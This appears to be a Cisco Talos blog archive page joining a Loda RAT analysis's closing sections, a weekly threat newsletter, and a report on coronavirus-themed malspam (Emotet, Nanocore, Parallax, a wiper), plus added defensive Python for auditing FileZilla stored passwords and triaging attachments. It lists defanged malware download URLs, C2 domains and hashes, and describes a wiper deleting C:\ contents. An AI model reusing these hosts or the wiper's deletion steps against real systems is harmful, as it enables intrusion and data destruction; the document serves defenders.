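Because FileZilla's recent-servers file holds credentials that are at best base64-encoded, an administrator can audit endpoints for stored passwords before a RAT like Loda gets to them. The following is an added example for this post, not Talos or FileZilla code: it parses a `recentservers.xml` document (normally under the user's roaming AppData FileZilla folder), and for each server reports whether a password is stored and in which form, without ever printing the secret. The XML below is constructed for the example and uses placeholder hostnames; the element names follow the FileZilla 3 file layout, which is an assumption to check against the version in use.

```python
import xml.etree.ElementTree as ET

# Constructed recentservers.xml: one entry with a base64 "Pass" element and
# one interactive-logon entry with no stored password.
SAMPLE_RECENTSERVERS = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.46.3" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.invalid</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>deploy</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>sftp.example.invalid</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>backup</User>
      <Logontype>0</Logontype>
    </Server>
  </RecentServers>
</FileZilla3>
"""


def audit_recent_servers(xml_text):
    """Classify each <Server> entry by how its password is stored.

    Returns a list of dicts with host, user and password_stored in
    {"none", "plaintext", "base64"}; the password value itself is never
    copied into the report, so the output is safe to ship to a SIEM.
    """
    root = ET.fromstring(xml_text)
    report = []
    for server in root.iter("Server"):
        pass_el = server.find("Pass")
        if pass_el is None or not (pass_el.text or "").strip():
            stored = "none"
        elif pass_el.get("encoding") == "base64":
            stored = "base64"
        else:
            stored = "plaintext"  # older FileZilla builds wrote the raw value
        report.append({
            "host": server.findtext("Host", ""),
            "port": server.findtext("Port", ""),
            "user": server.findtext("User", ""),
            "password_stored": stored,
        })
    return report


def hosts_with_stored_passwords(xml_text):
    """Hosts whose credentials would be readable by any process running as
    the user, i.e. the entries worth clearing or moving to key-based auth."""
    return [e["host"] for e in audit_recent_servers(xml_text)
            if e["password_stored"] != "none"]


if __name__ == "__main__":
    for entry in audit_recent_servers(SAMPLE_RECENTSERVERS):
        print("%(host)s:%(port)s user=%(user)s password=%(password_stored)s" % entry)
```

Base64 is an encoding, not protection, so the report treats "base64" and "plaintext" alike when deciding which entries need remediation; the distinction is kept only so the audit can tell which FileZilla generation wrote the file.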

                One interesting functionality that persists through the versions of Loda is the command "QURAN". This command streams music from "live.mp3quran[.]net:9976" in Windows Media Player using the Microsoft Media Server (MMS) protocol. MMS is a deprecated Microsoft proprietary network streaming protocol used to stream media in Windows Media Player.

                "QURAN" command function
                There is no other functionality to this command other than playing the music that is streaming at this URL to the infected host.

                Conclusion


                Although the functionality of this new version of Loda is similar to previous versions, this new iteration is a slightly more well-developed RAT. Loda is simple yet has proven to be effective, and poses a serious threat to an infected host. The credential stealing capabilities could lead to significant financial loss or a potential data breach. By changing the obfuscation techniques the threat actor was able to lower the detection rate considerably. The change in persistence mechanisms and AV solution detection show that the malware authors are actively improving the functionality of Loda.

                Coverage

                Snort

                [SID] 53031

                ClamAV

                Win.Packed.LokiBot-6963314-0
                Doc.Exploit.Cve_2017_11882-7570663-1
                Doc.Downloader.Loda-7570590-0

                Additional ways our customers can detect and block this threat are listed below.

                Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

                Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

                Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

                AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

                Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

                Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

                IOCs:


                http://lcodigo[.]com/apiW/config/uploads/tmp/documento.doc
                http://lcodigo[.]com/apiW/config/uploads/tmp/fkrkdn.msi
                http://lcodigo[.]com/apiW/config/uploads/tmp/kctlqz.msi
                http://drinkfoodapp[.]com/AdminDF/assets/img/app/settings.doc
http://drinkfoodapp[.]com/AdminDF/assets/img/app/grcfne.msi
                http://yewonder[.]com/wp-content/plugins/ltfhmam/eklnxx.msi
                https://www[.]miracleworkstudios[.]com/wp-content/uploads/2019/12/app/updates.doc
                http://wp[.]168gamer[.]com/secured/mcsonb.msi
                http://wp[.]168gamer[.]com/secured/office.doc

                Docs:


                b5df816986a73e890f41ff0c0470a2208df523f17eb4eac9c5f0546da2ec161e
                af42191fe2ea328080939ec656302a8f364dac44b5cd8277dcbaeb15ff499178
36865059f1c142ba1846591aae8d78d8a109a0dc327a88547e41e3663bad2eaf
e15336491ab57a16a870edd5b135014b62387cb45e4e490b9d4091c54394dec4

                MSI:


                9edd2bfdb0c177f046cec1392d31ee3f67174e0a23fdf7e4b6fd580e769f0493
                8b989db4a9f8c3f0fa825cca35386ac4be4e33fd2ea53a118d4f4dd8259aeccc
                633f3970c31c9cb849bd5f66c3a783538bb2327b4bec5774b870f8b3b53ea3c1
                C65668958c5dfeccb40abd0771c17d045f24c78f51ea6c3955e110f53ad8eece
                740a5c19645d5a90fc1e11c84f5d6a058dc50206337aa37bbc783bd54ba84a79
                6cb47f2ecd58349ffe65d7ea281eea2ebd231bbaac30843f872ae2249bd140b0

                C2:


                4success[.]zapto[.]org
                success20[.]hopto[.]org
                breakthrough[.]hopto[.]org

                Threat Source newsletter (Feb. 13, 2020)


                Newsletter compiled by Jon Munshaw.

                Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

                This month’s Microsoft Patch Tuesday was particularly hefty, with the company disclosing nearly 100 vulnerabilities — three of which Talos researchers discovered. For our complete wrapup, check out the blog post here, and be sure to update your Microsoft products now if you haven’t already.

                Over on our YouTube page, we have a new video series we’re debuting called “Stories from the Field” with the Cisco Talos Incident Response Team. In each video, one of our team members will discuss one incident they remember working on and what lessons they took away from it, and what other defenders can learn.

                On the research side of things, we have new findings out about a variant of the Loda RAT. We recently discovered that this malware family added several anti-detection features and is targeting victims across the Americas. 

                And, as always, we have the latest Threat Roundup where we go through the top threats we saw — and blocked — over the past week.

                Upcoming public engagements

                Event: Cisco Live Australia 
                Location: Melbourne Convention & Exhibition Centre, Melbourne, Australia
                Date: March 3 - 6
                Speakers: Nick Biasini
                Synopsis: Cisco Talos specializes in early-warning intelligence and threat analysis necessary for maintaining a secure network. People responsible for defending networks realize that the security threat landscape is constantly in flux as attackers evolve their skills. Talos advances the overall efficacy of all Cisco security platforms by aggregating data, cooperating with teams of security experts, and applying the cutting-edge big data technology to security. In Nick's talk at Cisco Live, he will perform a deep analysis of recent threats and show how Talos leverages large datasets to deliver product improvements and mitigation strategies.

                Event: “Everyone's Advanced Now: The evolution of actors on the threat landscape” at Interop Tokyo 2020
                Location: Makuhari Messe, Tokyo, Japan
                Date: April 13 - 15
                Speakers: Nick Biasini
                Synopsis: In the past, there were two clear classes of adversary an enterprise would face: sophisticated and basic. These basic threats were commodity infections that would require simple triage and remediation. Today, these commodity infections can quickly turn into enterprise-crippling ransomware attacks, costing organizations millions of dollars to recover. Now more than ever, organizations need every advantage they can get — and threat intelligence is a big part of it. Having visibility into your own environment and attacks around the globe are equally vital to success. This talk will cover these trends and show how the gap between the sophisticated and the basic adversary is quickly disappearing.

                Cyber Security Week in Review

                • The U.S. charged four members of the Chinese military for their involvement in the massive Equifax data breach. Federal prosecutors allege the men hacked into Equifax’s systems and stole the personal information of nearly half of all Americans. 
                • Political pundits, security researchers and government officials are still unpacking the Iowa caucus debacle. While a results-reporting app has been largely to blame, there are several factors that went into a heavy delay of the democratic presidential primary results. 
                • One factor that may have been involved is a distributed denial-of-service attack on a phone line used to report election results in Iowa. Members of an online forum started an effort to flood the phone line the day of the election, with Iowa Democratic party officials saying they received "an unusually high volume of inbound phone calls to its caucus hotline." 
                • But the app used in Iowa isn’t the only new technology making an appearance in this year’s election. The discourse in Iowa is leading other states’ officials to take a closer look at their election systems and whether they have paper backups in place. 
                • A cyber group in the Gaza strip may be behind a new string of attacks on Palestinians. Attackers use politically themed documents and emails to lure victims into clicking on malicious links, eventually installing backdoors on their machines. 
                • The xHelper trojan on Android devices can even survive a factory reset of the infected device. Instead, users need to scan for specific files on their device and remove them prior to any resets so that the malware does not come pre-installed. 
                • Google says new initiatives for its Play store helped block more than 1.9 billion malware infections in 2019. The company says that new scanning policies and stepped-up privacy rules have cut back on malicious apps. 
                • A powerful Republican Senator blocked three new election security bills from being introduced to the full chamber. One of the bills would have outlawed voting machines from being connected to the internet, while another two would increase the level of cooperation between the FBI and local voting officials. 
                • Iran says it deflected one of the largest cyber attacks in the country’s history. Researchers found that internet access was restricted to roughly 25 percent of all users in Iran during the attack last week for about an hour. 

                Notable recent security issues

                Title: 12 critical vulnerabilities fixed in latest Microsoft Patch Tuesday  
Description: Microsoft released its monthly security update today, disclosing vulnerabilities across many of its products and releasing corresponding updates. This month's Patch Tuesday covers 98 vulnerabilities, 12 of which are considered critical and 84 that are considered important. There are also two bugs that were not assigned a severity. This month's patches include updates to the Windows kernel, the Windows scripting engine and Remote Desktop Protocol, among other software and features. Microsoft also provided a critical advisory covering updates to Adobe Flash Player.
                Snort SIDs: 48701, 48702, 53050 - 53056, 53061, 53072, 53073, 53079 - 53089 

                Title: Adobe releases updates for Reader, Flash Player and more  
                Description: Adobe disclosed 42 new vulnerabilities this week as part of its monthly security update, 35 of which are considered critical. These updates include Acrobat Reader, Flash Player and other Adobe products. Most notable are two bugs in Flash Player and Adobe Framemaker that could allow an attacker to execute arbitrary code on the victim machine. 
                Snort SIDs: 52331, 52332

                Most prevalent malware files this week

                SHA 256: 1460fd00cb6addf9806a341fee9c5ab0a793762d1d97dca05fa17467c8705af7 
                MD5: 88cbadec77cf90357f46a3629b6737e6
                Typical Filename: FlashHelperServices.exe
                Claimed Product: Flash Helper Services
                Detection Name: PUA.Win.File.2144flashplayer::tpd 

                SHA 256: 85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5
                MD5: 8c80dd97c37525927c1e549cb59bcbf3
                Typical Filename: eternalblue-2.2.0.exe
                Claimed Product: N/A
                Detection Name: W32.85B936960F.5A5226262.auto.Talos

                SHA 256: 97d8ea6cee63296eaf0fa5d97a14898d7cec6fa49fee1bf77c015ca7117a2ba7
                MD5: be52a2a3074a014b163096055df127a0
                Typical Filename: xme64-553.exe 
                Claimed Product: N/A
                Detection Name: Win.Trojan.Coinminer::tpd

                SHA 256: 15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b
                MD5: 799b30f47060ca05d80ece53866e01cc
                Typical Filename: mf2016341595.exe
                Claimed Product: N/A
                Detection Name: W32.Generic:Gen.22fz.1201

                SHA 256: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f
                MD5: e2ea315d9a83e7577053f52c974f6a5a
                Typical Filename: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f
                Claimed Product: N/A
                Detection Name: W32.AgentWDCR:Gen.21gn.1201

                Keep up with all things Talos by following us on Twitter. Snort, ClamAV and Immunet also have their own accounts you can follow to keep up with their latest updates. You can also subscribe to the Beers with Talos podcast here (as well as on your favorite podcast app). And, if you're not already, you can also subscribe to the weekly Threat Source newsletter here.

                Threat actors attempt to capitalize on coronavirus outbreak



                By Nick Biasini and Edmund Brumaghin.
                • Coronavirus is dominating the news, and threat actors are taking advantage.
                • Cisco Talos has found multiple malware families being distributed with coronavirus lures and themes. This includes Emotet and several RAT variants.

                Executive Summary

                Using the news to try to increase clicks and drive traffic is nothing new for malicious actors. We commonly see actors leveraging current news stories or events to increase the likelihood of infection. The biggest news currently is focused on the new virus affecting the world, with a focus on China: the coronavirus. There are countless news articles and email-based marketing campaigns going at full throttle right now, so we wanted to take a deeper look at how this is manifesting itself on the threat landscape.

                Our investigation had several phases, first looking at the email-based campaigns, then pivoting into open-source intelligence sources for additional samples. These investigations uncovered a series of campaigns from the adversaries behind Emotet, along with a series of other commodity malware families using these same topics as lures, and a couple of odd documents and applications along the way. What was also striking was the amount of legitimate email containing things like Microsoft Word documents and Excel spreadsheets related to the coronavirus. This really underscores why using these as lures is so attractive to adversaries, and why organizations and individuals need to be vigilant when opening mail attachments, regardless of their origin.

                What's new? Malware authors and distributors will go through any means necessary to achieve success and generate revenue, and this is just the latest example. These lures tied to coronavirus are likely to only increase in volume and variety as the virus continues to spread and dominate the headlines.

                How did it work? The majority of these campaigns were driven through email, and malspam specifically. These actors would send coronavirus-themed emails to potential victims and, in some cases, use filenames related to coronavirus as well, enticing victims to click attachments. One of the reasons this was so effective was the large amount of legitimate email related to coronavirus that also included attachments.

                So What?
                • Organizations need to realize that attackers are going to use current events to try to get victims to open attachments or click links. You should be prepared and vigilant in identifying these emails and ensuring they don't make it to your users' inboxes.
                • There is a wide variety of threats represented here, so there isn't one single threat to be concerned with; just realize there will likely be a lot more.
                • It's not just malicious content: there are a lot of weird executables and other files floating around that are coronavirus-themed and are unwanted, albeit not inherently malicious.

                Malspam campaigns

                During our analysis of email telemetry, we identified several malicious spam campaigns leveraging news related to coronavirus to entice potential victims to open attachments and initiate various malware infections. Several malware families are currently being distributed via these malspam campaigns including Emotet, Nanocore RAT, and various trojans.

                Emotet

                Emotet is one of the most prevalent malware families being actively distributed. We have previously analyzed this threat in various posts, notably here and here. Emotet distribution campaigns are commonly observed integrating current news topics of interest, and the current interest in coronavirus is no different. It has been previously reported that Emotet has been making use of this theme in various email distribution campaigns, which we have also observed. As previously described, these emails typically contain malicious Microsoft Word documents that function as downloaders for the Emotet malware.

                An example of one of the malicious Word documents is below. As usual with these sorts of attachments, users are prompted to Enable Editing and Enable Content, granting the attacker the ability to execute code on the endpoint to facilitate the delivery and execution of Emotet, thus infecting the system.

                Over the course of the past few weeks, we have observed large quantities of messages featuring this and similar themes being used to spread Emotet to victims.

                Nanocore RAT

                It is important to note that Emotet is not the only malware family currently being distributed using coronavirus-themed malspam campaigns. We have also observed Nanocore RAT being distributed using similar types of email-based malware distribution campaigns. Nanocore RAT is a remote access trojan (RAT) that is commonly distributed by various threat actors. RATs are one of the more common threats we see delivered on the threat landscape. These malware families typically provide the attacker with remote access into the system and the ability to grab things like keystrokes, files and webcam feeds, and to download and execute files. During our investigation, we found a campaign delivering Nanocore, one of these RATs. The campaign was a notification to customers about the status of the coronavirus and the steps the sender was supposedly taking as an organization, as shown below.

                As you can see, the email came with a ZIP file attached, which contained a PIF executable. Once the victim executed the file, Nanocore RAT was installed on the system, giving the adversaries remote access.

                Other campaigns

                We did find at least one other campaign that was ongoing, but at the time of discovery the command and control (C2) servers were down and final payload retrieval wasn't possible; the malicious intent, however, was clear. This started like many of the other campaigns, with a coronavirus theme.

                This particular email was notifying customers of a delay in shipping due to coronavirus and attached a .pdf.ace invoice file. Inside the compressed archive was an executable purporting to be a signed order confirmation. Upon execution, it attempted to retrieve additional data, but because the server was down, it is not possible to identify the final payload as of the time of publishing.

                Additional malware campaigns


                In addition to email campaigns leveraging coronavirus, we also analyzed various open-source malware repositories in an attempt to identify additional malware making use of the disease. We discovered several examples of malware that had been submitted to the repositories including adware, wipers, and other various trojans.

                Parallax RAT

                During our open-source investigation, we came across a sample aptly named "new infected CORONAVIRUS sky 03.02.2020.pif." This file was likely delivered as an attachment to an email in some sort of compressed archive. Upon execution, the RAT is installed and persistence is achieved by creating links in the user's startup folder and creating several scheduled tasks; it then establishes command and control communications with a dynamic DNS provider domain, which is fairly common with RAT distribution.

                Parallax is another RAT, not much different from the Nanocore campaign we found above. It has the same basic functionality and gives the attacker the ability to upload and download files, as well as grab things like keystrokes and screen captures.

                Other samples found

                During the course of the investigation, we came across several samples that appeared to be malicious and were tagged as malicious in various engines but were, in fact, odd jokes or non-malicious content, including a fake wiper. This file was one of many found with the suspicious filename "CoronaVirus.exe." This particular one immediately appeared to lock the screen upon execution.

                The rough translation of the text displayed to the user is "Deleting all files and folders on this computer - Coronavirus." Upon completion of the counter, the button at the bottom became clickable, and when clicked, displayed the following message:

                This says it is a joke and the user can press Alt + F12 to exit. If the user presses these keys, it drops them back at the desktop. Upon further analysis, it does not appear there were any other malicious actions taken. This is just one of several odd examples found in our research, including another joke game written in VBS and an odd executable wrapper of a well-known outbreak map for coronavirus. None of these files were malicious, but they did take actions that could be viewed as malicious; as such, we have seen many antivirus vendors detect these as malicious executables. At the very least, they are unwanted applications, albeit not inherently malicious.

                One additional malware sample we discovered was a wiper designed to destroy infected systems. It was initially submitted to various malware repositories with the filename "冠状病毒.exe", which translates to "coronavirus." The malware, when executed on systems, uses several techniques to delete data from both the file system and registry in an attempt to disrupt system operations. For example, we observed the malware invoking the Windows Command Processor and using the "rd" Windows command to iterate through the directory structure of the C:\ drive, deleting the contents:

                It is important to note that there is no prior attempt to copy, exfiltrate, or save a copy of the contents and the malware does not appear to make any attempt to extort victims or otherwise generate revenue for the malware author.
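                The attachment patterns described in the malspam and open-source sections above (a ZIP carrying a PIF, a .pdf.ace archive holding an executable, themed macro documents, the sample filenames) together with the SHA256 IOCs listed at the end of this post can be turned into a simple mail-gateway triage rule. The following is an added example, not Cisco Talos code; the gateway records, the Attachment fields and the verdict rules are constructed assumptions.

```python
"""Attachment triage built from the lure patterns described in this post.

Added example, not Cisco Talos code. The gateway records below are
constructed; the Attachment fields and the verdict rules are assumptions.
"""
from dataclasses import dataclass, field

# SHA256 values from the post's Indicators of Compromise section.
IOC_SHA256 = {
    "345d8b4c0479d97440926471c2a8bed43162a3d75be12422c1c410f5ec90acd9": "Parallax RAT",
    "adde95e8813ca27d88923bd091ca2166553a7b904173ef7a2c04bb3ddf8b14a9": "Wiper",
    "c57fa2a5d1a65a687f309f23ca3cfc6721d382b06cf894ee5cd01931bbc17a46": "Nanocore",
}
THEME_WORDS = ("coronavirus", "corona", "冠状病毒")  # lure strings seen in the post
EXEC_EXT = {"exe", "pif", "scr", "com", "bat", "vbs", "js"}
ARCHIVE_EXT = {"zip", "ace", "rar", "7z"}
DOC_EXT = {"pdf", "doc", "docx", "xls", "xlsx"}

@dataclass
class Attachment:
    name: str
    sha256: str = "0" * 64  # placeholder hash for constructed samples
    has_macros: bool = False  # would come from the gateway's document parser (assumed)
    inner_names: list = field(default_factory=list)  # file names inside an archive

def _exts(name):
    """All extensions of a file name, lower-cased: 'a.pdf.ace' -> ['pdf', 'ace']."""
    return name.lower().rsplit("/", 1)[-1].split(".")[1:]

def triage(att):
    """Return (verdict, reasons); verdict is 'block', 'review' or 'allow'."""
    reasons = []
    exts = _exts(att.name)
    last = exts[-1] if exts else ""
    if att.sha256.lower() in IOC_SHA256:
        reasons.append("known IOC: " + IOC_SHA256[att.sha256.lower()])
    if last in EXEC_EXT:
        reasons.append("executable attachment: ." + last)
    # 'invoice.pdf.ace': a document extension in front of an archive or executable one
    if len(exts) >= 2 and exts[-2] in DOC_EXT and last in ARCHIVE_EXT | EXEC_EXT:
        reasons.append("document extension masking ." + last)
    # the Nanocore campaign: a ZIP carrying a PIF executable
    for inner in att.inner_names:
        if _exts(inner) and _exts(inner)[-1] in EXEC_EXT:
            reasons.append("archive contains executable: " + inner)
    if reasons:
        return "block", reasons
    # The theme alone is not a verdict: the post notes plenty of legitimate
    # coronavirus documents in the mail flow. Themed macro documents (the Emotet
    # pattern) and themed archives go to a human instead of being blocked.
    themed = any(w in att.name.lower() for w in THEME_WORDS)
    if themed and (att.has_macros or last in ARCHIVE_EXT):
        kind = "archive" if last in ARCHIVE_EXT else "macro document"
        return "review", ["coronavirus-themed " + kind]
    return "allow", []

# Constructed gateway records modelled on the campaigns in the post.
SAMPLES = [
    Attachment("Coronavirus update.zip", inner_names=["statement.pif"]),
    Attachment("invoice.pdf.ace", inner_names=["signed order confirmation.exe"]),
    Attachment("new infected CORONAVIRUS sky 03.02.2020.pif",
               sha256="345d8b4c0479d97440926471c2a8bed43162a3d75be12422c1c410f5ec90acd9"),
    Attachment("coronavirus_guidance.docx"),  # looks like the many legitimate documents
    Attachment("CoronaVirus_notice.doc", has_macros=True),  # Emotet-style maldoc
    Attachment("冠状病毒.exe"),  # the wiper's submitted file name
]

def summarize(records=SAMPLES):
    """Map each attachment name to its verdict."""
    return {a.name: triage(a)[0] for a in records}

if __name__ == "__main__":
    for a in SAMPLES:
        print(a.name, *triage(a))
```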

                Conclusion


                Malicious actors are always going to do whatever they can to increase infection rates and, in turn, increase revenue; this includes using the news and fear to achieve their goals. This is one of the cases where both news and fear can be used. In a world where threats like Emotet are stealing emails and replying in-line, users need to be increasingly skeptical of all attachments, regardless of source. These attacks can be seen in an email thread with a colleague or friend and, in some cases, may come directly from that colleague or friend. Additionally, anything news-related should be treated with a little extra skepticism: go out and do your own research instead of just clicking links and opening documents that are sent your way.

                Coverage


                Ways our customers can detect and block this threat are listed below.

                Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware detailed in this post. Below is a screenshot showing how AMP can protect customers from this threat. Try AMP for free here.


                Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

                Email Security can block malicious emails sent by threat actors as part of their campaign.

                Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), Cisco ISR, and Meraki MX can detect malicious activity associated with this threat.

                Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

                Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

                Additional protections with context to your specific environment and threat data are available from the Firepower Management Center.

                Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

                Indicators of Compromise (IOC)

                Hashes (SHA256)

                345d8b4c0479d97440926471c2a8bed43162a3d75be12422c1c410f5ec90acd9 (Parallax RAT)
                Adde95e8813ca27d88923bd091ca2166553a7b904173ef7a2c04bb3ddf8b14a9 (Wiper)
                C57fa2a5d1a65a687f309f23ca3cfc6721d382b06cf894ee5cd01931bbc17a46 (Nanocore)

                Emotet Maldocs (SHA256)


                Domains

                vahlallha[.]duckdns[.]org
